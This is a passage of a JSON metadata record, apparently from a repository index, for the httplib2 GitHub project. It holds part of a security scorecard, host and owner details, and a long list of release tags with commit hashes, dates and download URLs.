vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36646944,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-14T02:00:06.934Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttpli